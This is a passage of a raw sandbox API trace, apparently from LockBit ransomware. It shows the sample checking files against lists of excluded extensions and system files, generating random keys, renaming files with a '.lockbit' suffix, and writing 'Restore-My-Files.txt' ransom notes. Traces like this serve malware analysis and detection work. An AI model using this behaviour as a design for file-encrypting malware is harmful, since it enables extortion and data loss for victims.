-1 [0166.268] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.268] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.269] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00034_.WMF") returned 1 [0166.269] lstrcmpiW (lpString1="ntldr", lpString2="PE00034_.WMF") returned -1 [0166.269] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00034_.WMF") returned -1 [0166.269] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00034_.WMF") returned -1 [0166.269] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00034_.WMF") returned -1 [0166.269] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00034_.WMF") returned 1 [0166.269] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00034_.WMF") returned -1 [0166.269] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.269] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00034_.WMF") returned=".WMF" [0166.269] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.269] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.270] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.270] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.270] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00034_.WMF.lockbit") returned 72 [0166.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00034_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00034_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.272] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.272] malloc (_Size=0x40068) returned 0x3df0008 [0166.272] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15708) returned 1 [0166.272] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.273] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.273] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.273] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.273] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.278] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00034_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00034_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.278] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.278] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0166.280] free (_Block=0x1fa2ed8) [0166.280] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00034_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.280] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.280] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.280] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f647900, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8f647900, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00049_.WMF", cAlternateFileName="")) returned 1 [0166.280] lstrcmpiW (lpString1=".", lpString2="PE00049_.WMF") returned -1 [0166.280] lstrcmpiW (lpString1="..", lpString2="PE00049_.WMF") returned -1 [0166.280] PathFindExtensionW (pszPath="PE00049_.WMF") returned=".WMF" [0166.280] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.280] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.280] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.280] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.280] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.280] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.280] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.281] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.281] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.282] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00049_.WMF") returned 1 [0166.282] lstrcmpiW (lpString1="ntldr", lpString2="PE00049_.WMF") returned -1 [0166.282] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00049_.WMF") returned -1 [0166.282] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00049_.WMF") returned -1 [0166.282] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00049_.WMF") returned -1 [0166.282] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00049_.WMF") returned 1 [0166.282] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00049_.WMF") returned -1 [0166.282] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.283] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00049_.WMF") returned=".WMF" [0166.283] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.283] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.283] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.284] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.284] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.284] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.284] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.284] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.284] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00049_.WMF.lockbit") returned 72 [0166.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00049_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00049_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.285] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.285] malloc (_Size=0x40068) returned 0x3df0008 [0166.285] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16448) returned 1 [0166.285] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.286] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.287] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.306] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00049_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00049_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0166.306] malloc (_Size=0xa6) returned 0x1fa2ed8 [0166.306] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0166.307] free (_Block=0x1fa2ed8) [0166.307] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00049_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0166.307] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0166.307] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0166.307] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e334c00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6cd8b0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8e334c00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x4d18, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE00050_.WMF", cAlternateFileName="")) returned 1 [0166.308] lstrcmpiW (lpString1=".", lpString2="PE00050_.WMF") returned -1 [0166.308] lstrcmpiW (lpString1="..", lpString2="PE00050_.WMF") returned -1 [0166.308] PathFindExtensionW (pszPath="PE00050_.WMF") returned=".WMF" [0166.308] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.308] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0166.309] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0166.309] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE00050_.WMF") returned 1 [0166.309] lstrcmpiW (lpString1="ntldr", lpString2="PE00050_.WMF") returned -1 [0166.309] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE00050_.WMF") returned -1 [0166.309] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE00050_.WMF") returned -1 [0166.309] lstrcmpiW (lpString1="autorun.inf", lpString2="PE00050_.WMF") returned -1 [0166.309] lstrcmpiW (lpString1="thumbs.db", lpString2="PE00050_.WMF") returned 1 [0166.309] lstrcmpiW (lpString1="iconcache.db", lpString2="PE00050_.WMF") returned -1 [0166.309] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0166.309] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00050_.WMF") returned=".WMF" [0166.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0166.310] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0166.310] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0166.310] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00050_.WMF.lockbit") returned 72 [0166.310] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00050_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00050_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0166.312] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0166.312] malloc (_Size=0x40068) returned 0x3df0008 [0166.312] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19736) returned 1 [0166.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0166.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0166.313] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, 